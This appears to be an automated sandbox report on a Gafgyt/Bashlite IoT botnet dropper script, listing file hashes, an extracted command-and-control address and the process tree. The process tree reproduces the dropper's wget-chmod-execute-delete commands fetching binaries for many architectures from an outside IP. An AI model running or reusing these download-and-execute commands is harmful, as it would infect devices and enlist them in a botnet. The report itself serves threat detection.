Analysis

  • max time kernel
    13s
  • max time network
    15s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    04/08/2024, 13:39

General

  • Target

    sex.sh

  • Size

    1KB

  • MD5

    4a5211253d90ad66dea73ffa8809bbd8

  • SHA1

    27c91298804fd2e46e280d4259170e6a48e4280d

  • SHA256

    bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276

  • SHA512

    a844fe1fdd89254ff069b0bc3fa3b5812936f9560f693cd6c5658f4232f42efc9e926a3d51bd152a16283c8ab322967f6f7686f536ea395047477661b9aad0eb

Score
10/10

Malware Config

Extracted

Family

gafgyt

C2

5.252.177.70:23

Signatures

  • Detected Gafgyt variant 1 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • Executes dropped EXE 1 IoCs
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sex.sh
    /tmp/sex.sh
    1⤵
      PID:710
      • /usr/bin/wget
        wget http://216.172.177.16/mips
        2⤵
          PID:714
        • /bin/chmod
          chmod +x mips
          2⤵
            PID:732
          • /tmp/mips
            ./mips
            2⤵
              PID:734
            • /bin/rm
              rm -rf mips
              2⤵
                PID:735
              • /usr/bin/wget
                wget http://216.172.177.16/mipsel
                2⤵
                  PID:736
                • /bin/chmod
                  chmod +x mipsel
                  2⤵
                    PID:741
                  • /tmp/mipsel
                    ./mipsel
                    2⤵
                      PID:743
                    • /bin/rm
                      rm -rf mipsel
                      2⤵
                        PID:744
                      • /usr/bin/wget
                        wget http://216.172.177.16/sh4
                        2⤵
                          PID:745
                        • /bin/chmod
                          chmod +x sh4
                          2⤵
                            PID:746
                          • /tmp/sh4
                            ./sh4
                            2⤵
                              PID:747
                            • /bin/rm
                              rm -rf sh4
                              2⤵
                                PID:748
                              • /usr/bin/wget
                                wget http://216.172.177.16/x86
                                2⤵
                                  PID:749
                                • /bin/chmod
                                  chmod +x x86
                                  2⤵
                                    PID:750
                                  • /tmp/x86
                                    ./x86
                                    2⤵
                                      PID:751
                                    • /bin/rm
                                      rm -rf x86
                                      2⤵
                                        PID:752
                                      • /usr/bin/wget
                                        wget http://216.172.177.16/arm61
                                        2⤵
                                        • Writes file to tmp directory
                                        PID:753
                                      • /bin/chmod
                                        chmod +x arm61
                                        2⤵
                                          PID:754
                                        • /tmp/arm61
                                          ./arm61
                                          2⤵
                                          • Executes dropped EXE
                                          PID:755
                                        • /bin/rm
                                          rm -rf arm61
                                          2⤵
                                            PID:757
                                          • /usr/bin/wget
                                            wget http://216.172.177.16/i686
                                            2⤵
                                              PID:758
                                            • /bin/chmod
                                              chmod +x i686
                                              2⤵
                                                PID:759
                                              • /tmp/i686
                                                ./i686
                                                2⤵
                                                  PID:760
                                                • /bin/rm
                                                  rm -rf i686
                                                  2⤵
                                                    PID:761
                                                  • /usr/bin/wget
                                                    wget http://216.172.177.16/ppc
                                                    2⤵
                                                      PID:762
                                                    • /bin/chmod
                                                      chmod +x ppc
                                                      2⤵
                                                        PID:763
                                                      • /tmp/ppc
                                                        ./ppc
                                                        2⤵
                                                          PID:764
                                                        • /bin/rm
                                                          rm -rf ppc
                                                          2⤵
                                                            PID:765
                                                          • /usr/bin/wget
                                                            wget http://216.172.177.16/586
                                                            2⤵
                                                              PID:766
                                                            • /bin/chmod
                                                              chmod +x 586
                                                              2⤵
                                                                PID:767
                                                              • /tmp/586
                                                                ./586
                                                                2⤵
                                                                  PID:768
                                                                • /bin/rm
                                                                  rm -rf 586
                                                                  2⤵
                                                                    PID:769
                                                                  • /usr/bin/wget
                                                                    wget http://216.172.177.16/m68k
                                                                    2⤵
                                                                      PID:770
                                                                    • /bin/chmod
                                                                      chmod +x m68k
                                                                      2⤵
                                                                        PID:771
                                                                      • /tmp/m68k
                                                                        ./m68k
                                                                        2⤵
                                                                          PID:772
                                                                        • /bin/rm
                                                                          rm -rf m68k
                                                                          2⤵
                                                                            PID:773
                                                                          • /usr/bin/wget
                                                                            wget http://216.172.177.16/dc
                                                                            2⤵
                                                                              PID:774
                                                                            • /bin/chmod
                                                                              chmod +x dc
                                                                              2⤵
                                                                                PID:781
                                                                              • /tmp/dc
                                                                                ./dc
                                                                                2⤵
                                                                                  PID:782
                                                                                • /bin/rm
                                                                                  rm -rf dc
                                                                                  2⤵
                                                                                    PID:783
                                                                                  • /usr/bin/wget
                                                                                    wget http://216.172.177.16/dss
                                                                                    2⤵
                                                                                      PID:785
                                                                                    • /bin/chmod
                                                                                      chmod +x dss
                                                                                      2⤵
                                                                                        PID:792
                                                                                      • /tmp/dss
                                                                                        ./dss
                                                                                        2⤵
                                                                                          PID:794
                                                                                        • /bin/rm
                                                                                          rm -rf dss
                                                                                          2⤵
                                                                                            PID:795
                                                                                          • /usr/bin/wget
                                                                                            wget http://216.172.177.16/co
                                                                                            2⤵
                                                                                              PID:796
                                                                                            • /bin/chmod
                                                                                              chmod +x co
                                                                                              2⤵
                                                                                                PID:803
                                                                                              • /tmp/co
                                                                                                ./co
                                                                                                2⤵
                                                                                                  PID:805
                                                                                                • /bin/rm
                                                                                                  rm -rf co
                                                                                                  2⤵
                                                                                                    PID:807
                                                                                                  • /usr/bin/wget
                                                                                                    wget http://216.172.177.16/scar
                                                                                                    2⤵
                                                                                                      PID:808
                                                                                                    • /bin/chmod
                                                                                                      chmod +x scar
                                                                                                      2⤵
                                                                                                        PID:815
                                                                                                      • /tmp/scar
                                                                                                        ./scar
                                                                                                        2⤵
                                                                                                          PID:817
                                                                                                        • /bin/rm
                                                                                                          rm -rf scar
                                                                                                          2⤵
                                                                                                            PID:819

                                                                                                        Network

                                                                                                              MITRE ATT&CK Matrix

                                                                                                              Replay Monitor

                                                                                                              Loading Replay Monitor...

                                                                                                              Downloads

                                                                                                              • /tmp/arm61

                                                                                                                Filesize

                                                                                                                136KB

                                                                                                                MD5

                                                                                                                6820e48a7c8f9b287da8f0593b0a8f83

                                                                                                                SHA1

                                                                                                                4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f

                                                                                                                SHA256

                                                                                                                eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811

                                                                                                                SHA512

                                                                                                                0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c